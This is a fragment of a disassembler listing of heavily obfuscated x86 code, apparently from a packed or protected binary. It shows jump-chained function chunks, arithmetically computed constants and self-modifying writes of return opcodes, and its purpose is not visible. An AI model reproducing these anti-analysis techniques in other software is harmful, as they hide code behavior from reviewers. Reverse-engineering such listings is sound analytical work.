		jp	loc_453B61
		add	ecx, 8BD1B091h
		ror	edx, 7

loc_447C4F:				; CODE XREF: sub_453867:loc_4570FDj
		push	edi
		jmp	loc_45A664
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45447D

loc_447C55:				; CODE XREF: sub_45447D:loc_44AD3Fj
		rol	eax, 0Fh
		mov	[edi], ebp
		xchg	esi, [eax]
		xchg	ecx, edx
		jmp	loc_4436A4
; END OF FUNCTION CHUNK	FOR sub_45447D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_346. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A48B

loc_447C64:				; CODE XREF: sub_44A48B+12j
		jmp	loc_457997
; END OF FUNCTION CHUNK	FOR sub_44A48B
; ---------------------------------------------------------------------------
		jmp	ds:off_41E184
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D412

loc_447C6F:				; CODE XREF: y2kk37jd:00442418j
					; y2kk37jd:00446CF0j ...
		jz	loc_446CF5
		pop	edx
		mov	eax, [esp+0]
		push	edx
		jmp	loc_44B168
; END OF FUNCTION CHUNK	FOR sub_43D412
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D61E

loc_447C7F:				; CODE XREF: sub_43D61E:loc_442455j
					; sub_43D61E+4E40j
		sub	edi, 45367F3h
		add	edi, 6701C706h
		xchg	edi, [esp+8+var_8]
		jmp	loc_44B5BF
; END OF FUNCTION CHUNK	FOR sub_43D61E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AAA1

loc_447C93:				; CODE XREF: sub_44AAA1+6BCFj
		push	ecx
		sbb	edx, ecx
		jz	loc_45933A

loc_447C9C:				; CODE XREF: sub_44AAA1:loc_451664j
		sub	edi, 47D9E072h
		rol	edi, 10h
		and	edi, 0C299DC1h
		test	edi, 80000h

loc_447CB1:				; CODE XREF: sub_4458DD:loc_44563Fj
		jmp	loc_456297
; END OF FUNCTION CHUNK	FOR sub_44AAA1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_386. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E049

loc_447CB7:				; CODE XREF: sub_43E049+12232j
		add	ecx, 0BEBFD36Ch
		mov	[ecx], eax
		pop	ecx
		lea	eax, loc_441AF3
		call	sub_446FEB
; END OF FUNCTION CHUNK	FOR sub_43E049
; START	OF FUNCTION CHUNK FOR sub_440CD1

loc_447CCB:				; CODE XREF: sub_440CD1+5j
		jmp	nullsub_52
; END OF FUNCTION CHUNK	FOR sub_440CD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A298

loc_447CD0:				; CODE XREF: sub_44A298:loc_457884j
		add	edi, ecx
		add	edi, 954CC71h
		mov	[edi], eax
		push	offset loc_44457A
		jmp	nullsub_331
; END OF FUNCTION CHUNK	FOR sub_44A298
; ---------------------------------------------------------------------------

loc_447CE4:				; CODE XREF: y2kk37jd:00453735j
		mov	[ecx], esi
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_447CE6:				; CODE XREF: sub_43C851:loc_43EC6Ej
					; sub_45C14C-1996j
		rol	esi, 1
		add	esi, 0AFD68D74h
		push	offset sub_456BA1
		jmp	loc_43D9AF
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_447CF8:				; CODE XREF: sub_4411C3:loc_440196j
		mov	eax, [edx]
		jmp	loc_451DE8
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
		adc	eax, 3243F4A5h
		jmp	sub_452458
; ---------------------------------------------------------------------------

locret_447D0A:				; CODE XREF: y2kk37jd:00443AE0j
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_447D0B	proc near		; CODE XREF: sub_458FC0j

; FUNCTION CHUNK AT 00457D12 SIZE 00000013 BYTES

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		xchg	ecx, [esp+0]
		jmp	loc_457D12
sub_447D0B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_447D19:				; CODE XREF: sub_449C4F+C748j
		jnz	loc_44EE1C
; END OF FUNCTION CHUNK	FOR sub_449C4F
; START	OF FUNCTION CHUNK FOR sub_458A74

loc_447D1F:				; CODE XREF: sub_458A74+18j
		jmp	loc_44C867
; END OF FUNCTION CHUNK	FOR sub_458A74
; ---------------------------------------------------------------------------
		mov	ebp, edx
		jmp	loc_43BD91
; ---------------------------------------------------------------------------

loc_447D2B:				; CODE XREF: y2kk37jd:loc_45BDADj
		add	eax, 56040AB6h
		mov	eax, [eax]
		pop	ecx
		pop	ebp
		retn	4
; ---------------------------------------------------------------------------

loc_447D38:				; CODE XREF: y2kk37jd:0045A627j
		jmp	loc_445F05
; ---------------------------------------------------------------------------

loc_447D3D:				; CODE XREF: y2kk37jd:004426D1j
		jmp	loc_43C7D2

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_447D42	proc near		; CODE XREF: sub_457689:loc_45C5F0j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00441FAB SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00443321 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		jmp	loc_443321
sub_447D42	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_247. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_447D4B:				; CODE XREF: y2kk37jd:004524B5j
		jmp	loc_44CC22
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B0F5

loc_447D50:				; CODE XREF: sub_43B0F5+17002j
		jmp	loc_43F231
; END OF FUNCTION CHUNK	FOR sub_43B0F5
; ---------------------------------------------------------------------------

loc_447D55:				; CODE XREF: y2kk37jd:0044D088j
		jmp	loc_44E0B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AD49

loc_447D5A:				; CODE XREF: sub_44AD49+19j
		jmp	loc_4541FB
; END OF FUNCTION CHUNK	FOR sub_44AD49
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AD8D

loc_447D5F:				; CODE XREF: sub_45AD8D-1E0E5j
		jmp	sub_440CD1
; END OF FUNCTION CHUNK	FOR sub_45AD8D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_470. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_447D65:				; CODE XREF: sub_4411C3+18373j
		jmp	loc_43BF54
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451A35

loc_447D6A:				; CODE XREF: sub_451A35+12CDj
		jmp	loc_457EAB
; END OF FUNCTION CHUNK	FOR sub_451A35
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454C24

loc_447D6F:				; CODE XREF: sub_454C24-165E4j
		jge	loc_43F505
		add	eax, ebx
		pushf
		sub	edi, 733F22C6h

loc_447D7E:				; CODE XREF: sub_454C24:loc_43E638j
		add	ebx, 1D7D7F85h
		jmp	loc_441F82
; END OF FUNCTION CHUNK	FOR sub_454C24
; ---------------------------------------------------------------------------

loc_447D89:				; DATA XREF: sub_4504DD+860Bo
		pop	esi
		mov	eax, [ebp-0Ch]
		mov	ecx, 3F5h
		xor	edx, edx
		call	sub_43CF42
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_447D99:				; CODE XREF: sub_43F2F2+CEA6j
		jmp	loc_43F6FD
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------
		popf
		jmp	loc_441D19
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_447DA4:				; CODE XREF: sub_448CAE+13j
		rol	esi, 10h
		test	esi, 10000000h
		jmp	loc_4513D1
; END OF FUNCTION CHUNK	FOR sub_448CAE

; =============== S U B	R O U T	I N E =======================================



sub_447DB2	proc near		; DATA XREF: sub_44B508:loc_448C49o

; FUNCTION CHUNK AT 0044790D SIZE 00000005 BYTES

		rol	eax, 0Ch
		push	offset sub_442A78
		jmp	loc_44790D
sub_447DB2	endp

; ---------------------------------------------------------------------------

loc_447DBF:				; CODE XREF: y2kk37jd:00443E5Fj
		add	esi, 0D8903183h

; =============== S U B	R O U T	I N E =======================================



sub_447DC5	proc near		; CODE XREF: sub_458852+1208p

; FUNCTION CHUNK AT 00449F7A SIZE 00000008 BYTES

		xchg	edi, [esp+0]
		pop	edi
		lea	eax, sub_4477F9
		jmp	loc_449F7A
sub_447DC5	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_350. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_447DD5:				; CODE XREF: y2kk37jd:00442CCAj
		jp	loc_458F46

loc_447DDB:				; CODE XREF: y2kk37jd:loc_452029j
		lea	eax, [ebp-25Ch]
		cmp	dword ptr [eax], 47424454h
		jnz	loc_458D82
		jmp	loc_43CA12
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D51F

loc_447DF2:				; CODE XREF: sub_44D51F-1332j
		mov	byte ptr [eax],	0
		mov	esp, ebp
		pop	ebp
		jmp	nullsub_240
; ---------------------------------------------------------------------------

loc_447DFD:				; CODE XREF: sub_44D51F:loc_44FA05j
		push	offset loc_452407
		jmp	nullsub_239
; END OF FUNCTION CHUNK	FOR sub_44D51F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_447E07:				; CODE XREF: sub_4577FE:loc_45C38Fj
		or	edx, 4794FB99h
		sub	edx, 0AEFE7B50h
		add	edx, 47A38BDDh
		xchg	edx, [esp+0]
		jmp	loc_4431C3
; END OF FUNCTION CHUNK	FOR sub_4577FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_447E21:				; CODE XREF: y2kk37jd:loc_442F73j
					; sub_448CAE+C528j
		call	nullsub_8

locret_447E26:				; CODE XREF: y2kk37jd:004484C0j
		retn
; END OF FUNCTION CHUNK	FOR sub_448CAE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_8. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459546

loc_447E28:				; CODE XREF: sub_459546+Cj
		jmp	loc_445FD2
; END OF FUNCTION CHUNK	FOR sub_459546

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_447E2D	proc near		; CODE XREF: sub_445226+24j
					; sub_44B814:loc_45538Ap

var_14		= dword	ptr -14h

; FUNCTION CHUNK AT 0043BEE6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458959 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00458BBD SIZE 00000017 BYTES

		push	ebp
		mov	ebp, esp
		jo	sub_445083
		add	esp, 0FFFFFFF0h
		jmp	loc_43BEE6
sub_447E2D	endp


; =============== S U B	R O U T	I N E =======================================



sub_447E3E	proc near		; CODE XREF: y2kk37jd:0044D804j
					; sub_4415B8+18352p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00443A30 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AFCE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004523F6 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00456C7A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045B9EE SIZE 00000019 BYTES

		xchg	edi, [esp+0]
		pop	edi
		pushf
		push	37E38604h

loc_447E48:				; CODE XREF: sub_43F346:loc_443D71j
		jmp	loc_443A30
sub_447E3E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449E69

loc_447E4D:				; CODE XREF: sub_449E69+16j
		jge	loc_443E36
		jmp	loc_4448D8
; END OF FUNCTION CHUNK	FOR sub_449E69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CA5B

loc_447E58:				; CODE XREF: sub_43CA5B+DE3Bj
		jz	loc_44CC06

loc_447E5E:				; CODE XREF: sub_43CA5B:loc_4489D6j
		call	sub_446183
		mov	edx, 0F9A79DECh
		call	sub_440CD1
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+4+var_4]
		jmp	loc_43D096
; END OF FUNCTION CHUNK	FOR sub_43CA5B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107E

loc_447E78:				; CODE XREF: sub_44107E+33D2j
		jnz	loc_44E428

loc_447E7E:				; CODE XREF: sub_44107E:loc_443DACj
		push	offset sub_454715
		jmp	nullsub_423
; END OF FUNCTION CHUNK	FOR sub_44107E
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D3D0

loc_447E89:				; CODE XREF: sub_44D3D0+6j
		jmp	loc_447622
; END OF FUNCTION CHUNK	FOR sub_44D3D0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B79D

loc_447E8E:				; CODE XREF: sub_44B79D+15j
		jmp	loc_449033
; END OF FUNCTION CHUNK	FOR sub_44B79D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_332. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_447E94:				; CODE XREF: y2kk37jd:00444DA8j
		jmp	loc_4453C6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_140. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_447E9A:				; CODE XREF: sub_43F8B8+DBD1j
		jmp	loc_44C16B
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------

loc_447E9F:				; CODE XREF: y2kk37jd:0044D214j
		mov	eax, [ebp-0Ch]
		mov	[ebp-1Ch], eax
		lea	eax, [ebp-125h]
		mov	[ebp-20h], eax
		jmp	loc_44AFFC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B37E

loc_447EB3:				; CODE XREF: sub_43B37E+16j
		push	eax
		mov	eax, [ebp+8]
		call	sub_4425BE
; END OF FUNCTION CHUNK	FOR sub_43B37E
; START	OF FUNCTION CHUNK FOR sub_43D5C1

loc_447EBC:				; CODE XREF: sub_43D5C1+14E7Bj
		jmp	nullsub_126
; END OF FUNCTION CHUNK	FOR sub_43D5C1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B589

loc_447EC1:				; CODE XREF: sub_44B589+2j
		jmp	loc_444158
; END OF FUNCTION CHUNK	FOR sub_44B589
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_369. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_447EC7:				; CODE XREF: y2kk37jd:0044A273j
		mov	esi, [esi]
		add	eax, esi
		pop	esi
		pushf
		push	edx
		jmp	loc_445014
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A961

loc_447ED3:				; CODE XREF: sub_45A961:loc_43E8F6j
		jz	loc_448EA1
		jmp	loc_452B9E
; END OF FUNCTION CHUNK	FOR sub_45A961
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44866D

loc_447EDE:				; CODE XREF: sub_44866D+5586j
		sub	edi, ebx
		xchg	ecx, edi

loc_447EE2:				; CODE XREF: sub_44866D:loc_45599Cj
		push	eax
		lea	eax, dword_440320
		jmp	loc_457067
; END OF FUNCTION CHUNK	FOR sub_44866D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_447EEE:				; CODE XREF: sub_4592B8+17j
					; sub_445787:loc_45BDDCj
		push	0B7FF15DAh

loc_447EF3:				; CODE XREF: y2kk37jd:0044AB2Cj
		pop	edx
		or	edx, 0AA95A7B6h
		test	edx, 8
		jmp	loc_44D7B3
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ADEC

loc_447F05:				; CODE XREF: sub_45ADEC-C201j
		xchg	ebx, edi
		popf
		mov	edi, 1ADD8640h

loc_447F0D:				; CODE XREF: sub_45ADEC:loc_446AAAj
		call	sub_43E658
; END OF FUNCTION CHUNK	FOR sub_45ADEC
; START	OF FUNCTION CHUNK FOR sub_440EC8

loc_447F12:				; CODE XREF: sub_440EC8+9j
		xchg	esi, [esp+4+var_4]
		mov	ebp, esp
		push	edx
		mov	edx, ecx
		xchg	edx, [esp+8+var_8]
		lea	eax, sub_458161
		push	esi
		push	58674BBDh
		jmp	loc_43C8D6
; END OF FUNCTION CHUNK	FOR sub_440EC8

; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn


sub_447F2E	proc near		; CODE XREF: sub_445787+84DBj
		retn
sub_447F2E	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446303

loc_447F2F:				; CODE XREF: sub_446303+1Bj
		jmp	loc_44295F
; END OF FUNCTION CHUNK	FOR sub_446303
; ---------------------------------------------------------------------------
		push	ecx
		push	87648A43h
		pop	ecx
		rol	ecx, 1Dh
		call	sub_443DE1
		test	al, al
		jz	loc_44F87E
		jmp	loc_442F73
; ---------------------------------------------------------------------------
		push	12770931h
		jmp	sub_456F0F
; ---------------------------------------------------------------------------

loc_447F5A:				; CODE XREF: y2kk37jd:0043F887j
		mov	eax, [esp]
		push	offset sub_4480D8
		jmp	locret_458B39

; =============== S U B	R O U T	I N E =======================================



sub_447F67	proc near		; CODE XREF: y2kk37jd:0044772Dp
					; y2kk37jd:0044CE8Bj
		xchg	ecx, [esp+0]
		pop	ecx
		mov	[edx], eax
		pop	edx
		lea	eax, sub_456A36
		mov	byte ptr [eax],	0C3h
		jmp	sub_456A36
sub_447F67	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_447F7C	proc near		; CODE XREF: sub_4198C0+94p
					; y2kk37jd:004506CFj
					; DATA XREF: ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004495EA SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004506BB SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045A52B SIZE 00000005 BYTES

		push	ebx
		jmp	loc_4495EA
sub_447F7C	endp


; =============== S U B	R O U T	I N E =======================================



sub_447F82	proc near		; CODE XREF: y2kk37jd:0043DFF2j
					; sub_45A22Cp
		xchg	ecx, [esp+0]
		pop	ecx

loc_447F86:				; CODE XREF: y2kk37jd:0043EED2j
		call	sub_447F91
		jmp	ds:off_41E100
sub_447F82	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_447F91	proc near		; CODE XREF: sub_447F82:loc_447F86p
					; sub_445226+113F3j ...

var_10		= dword	ptr -10h

; FUNCTION CHUNK AT 0043CB8A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043EB90 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00440C22 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00447B9A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044F2EC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004500A7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455D52 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AD3C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045C202 SIZE 0000001A BYTES

		pop	edx
		jb	loc_43CB8A
		jmp	loc_4500A7
sub_447F91	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_447F9D:				; CODE XREF: sub_4458DD:loc_44B532j
		jz	loc_44564B
		jmp	loc_456857
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553C1

loc_447FA8:				; CODE XREF: sub_4553C1-6A40j
		jnz	loc_44F6A0
		pop	edi
		jmp	loc_43E351
; END OF FUNCTION CHUNK	FOR sub_4553C1

; =============== S U B	R O U T	I N E =======================================



sub_447FB4	proc near		; DATA XREF: sub_442F52+1480Bo

; FUNCTION CHUNK AT 0044D9C1 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045BB55 SIZE 00000022 BYTES

		push	esi
		push	0C9DFF6D6h
		pop	esi
		add	esi, 83B72CA1h
		jb	loc_45BB5D
		popf
		jmp	loc_45BB55
sub_447FB4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_447FCD:				; CODE XREF: y2kk37jd:0043D6C6j
					; sub_4448E2:loc_443C18j
		jle	loc_44E39F
		and	edx, edi
		ror	ebx, 1Eh

loc_447FD8:				; CODE XREF: y2kk37jd:loc_459D39j
		mov	eax, [esp+4+var_4]
		push	eax
		push	eax
		push	0BEFF9ECDh
		pop	eax
		jmp	loc_453DCE
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_447FE8:				; CODE XREF: sub_445787:loc_45B2D1j
		jnz	loc_43C109
		jmp	loc_44AE2F
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45833C

loc_447FF3:				; CODE XREF: sub_45833C:loc_43EABBj
		sbb	eax, 0DF94E1Dh
		popf
		sbb	edx, 0E070609Ch
		jmp	loc_44FC38
; END OF FUNCTION CHUNK	FOR sub_45833C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446AC6

loc_448005:				; CODE XREF: sub_446AC6+4453j
		sub	edx, ebp
		pushf
		jmp	loc_449141
; END OF FUNCTION CHUNK	FOR sub_446AC6
; ---------------------------------------------------------------------------

locret_44800D:				; CODE XREF: y2kk37jd:loc_45902Bj
		retn
; ---------------------------------------------------------------------------

loc_44800E:				; CODE XREF: y2kk37jd:0045BD0Ej
		jmp	loc_4511A6
; ---------------------------------------------------------------------------

loc_448013:				; CODE XREF: y2kk37jd:0043D573j
		jmp	nullsub_1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F770

loc_448018:				; CODE XREF: sub_43F770+49A0j
		and	ebx, 0FF1B872Ch
		xor	ebx, 11A8020h
		xchg	ebx, [esp+4+var_4]
		push	edx
		pushf
		push	offset loc_44D076
		jmp	loc_44D04D
; END OF FUNCTION CHUNK	FOR sub_43F770
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_448033:				; CODE XREF: sub_44CDD5:loc_4572D6j
		cmp	eax, 0EFA15BF6h
		jmp	loc_452615
; END OF FUNCTION CHUNK	FOR sub_44CDD5

; =============== S U B	R O U T	I N E =======================================



sub_44803E	proc near		; CODE XREF: sub_44A326+3p
					; y2kk37jd:00457F7Dj

; FUNCTION CHUNK AT 0045AC16 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045C07D SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		call	sub_43E25A
		mov	edx, [ebp+8]
		mov	eax, [edx]
		jmp	loc_45C07D
sub_44803E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_448051:				; CODE XREF: y2kk37jd:00449666j
		jle	loc_458697
		pushf

loc_448058:				; CODE XREF: y2kk37jd:loc_44C97Dj
					; y2kk37jd:loc_450B28j
		push	0
		push	eax
		mov	eax, edi
		xchg	eax, [esp]
		jmp	loc_4552A5
; ---------------------------------------------------------------------------
		mov	ecx, [edi]
		jmp	sub_4502E6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452884

loc_44806C:				; CODE XREF: sub_452884:loc_43EBB8j
		call	sub_445BB5
		push	0AC81E986h
		pop	eax
		or	eax, 680077D4h
		jmp	loc_45524C
; END OF FUNCTION CHUNK	FOR sub_452884
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_114. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107E

loc_448083:				; CODE XREF: sub_44107E-10BFj
		jmp	loc_45A0EF
; END OF FUNCTION CHUNK	FOR sub_44107E

; =============== S U B	R O U T	I N E =======================================



sub_448088	proc near		; CODE XREF: y2kk37jd:00445C5Fj
					; y2kk37jd:0045597Fp
		xchg	eax, [esp+0]
		pop	eax
		push	ecx
		mov	ecx, edx
		xchg	ecx, [esp+0]
		jmp	loc_45A41A
sub_448088	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C4A9

loc_448097:				; CODE XREF: sub_43C4A9:loc_45322Cj
		xor	esi, 7C59BD37h
		add	esi, ebp
		add	esi, 45A086D5h
		mov	[esi], eax
		xchg	ecx, [esp+0]
		mov	esi, ecx
		pop	ecx
		jmp	loc_43BFE4
; END OF FUNCTION CHUNK	FOR sub_43C4A9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_125. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_4480B3:				; CODE XREF: sub_448CAE+56Cj
		jmp	loc_44152D
; END OF FUNCTION CHUNK	FOR sub_448CAE
; ---------------------------------------------------------------------------
		mov	[ebp-8], eax
		push	offset loc_44BFB5
		jmp	locret_43B399
; ---------------------------------------------------------------------------

loc_4480C5:				; CODE XREF: y2kk37jd:0043B96Dj
		jbe	loc_44343F

; =============== S U B	R O U T	I N E =======================================



sub_4480CB	proc near		; CODE XREF: sub_44A3E7:loc_45C26Dp

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043B32D SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00440647 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00441C1D SIZE 00000037 BYTES
; FUNCTION CHUNK AT 0044679D SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00447074 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449161 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A923 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044ACE0 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0044C6BD SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044D694 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044EAEE SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044FC48 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451AA2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004591A9 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]

loc_4480CE:				; CODE XREF: y2kk37jd:loc_43E8AFj
		pop	ecx
		mov	eax, [esp-4+arg_0]
		push	esi
		jmp	loc_44679D
sub_4480CB	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4480D8	proc near		; DATA XREF: y2kk37jd:00447F5Do

; FUNCTION CHUNK AT 0044776D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045C23A SIZE 00000005 BYTES

		push	edx
		call	sub_459A7D
		mov	eax, 83ED7AACh
		call	sub_442C3E
		push	ebx

loc_4480E9:				; CODE XREF: sub_451634:loc_4423E9j
		push	0F2C6CAE5h
		pop	ebx
		xor	ebx, 33F76A80h
		jmp	loc_44776D
sub_4480D8	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_208. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442938

loc_4480FB:				; CODE XREF: sub_442938+77FDj
		jmp	nullsub_192
; END OF FUNCTION CHUNK	FOR sub_442938
; ---------------------------------------------------------------------------

loc_448100:				; CODE XREF: y2kk37jd:004400D3j
		jmp	loc_45432E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_448105:				; CODE XREF: sub_445226:loc_44381Aj
		pop	ebx
		xchg	eax, [esp+4+var_4]
		mov	ecx, eax
		pop	eax
		pop	ebp
		jmp	loc_441A08
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		dw 0E955h
		dd 0FFFFC9ECh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F618

loc_448118:				; CODE XREF: sub_43F618:loc_456008j
		push	0F851D199h
		xchg	edx, [esp+10h+var_10]
		mov	edi, edx
		pop	edx
		and	edi, 90803BEh
		jmp	loc_4555FE
; END OF FUNCTION CHUNK	FOR sub_43F618
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44812E:				; CODE XREF: sub_445226+132j
		sub	eax, 5E57E3E7h
		add	eax, 461500F2h
		call	sub_44113A
		mov	ds:off_41E038, eax
		lea	eax, sub_43D0C9
		mov	byte ptr [eax],	0C3h
		jmp	sub_43D0C9
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_448153:				; CODE XREF: y2kk37jd:0043C4EFj
		ja	loc_43D070

; =============== S U B	R O U T	I N E =======================================



sub_448159	proc near		; CODE XREF: sub_45B7AA:loc_44E77Ep

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043E563 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00440841 SIZE 00000005 BYTES
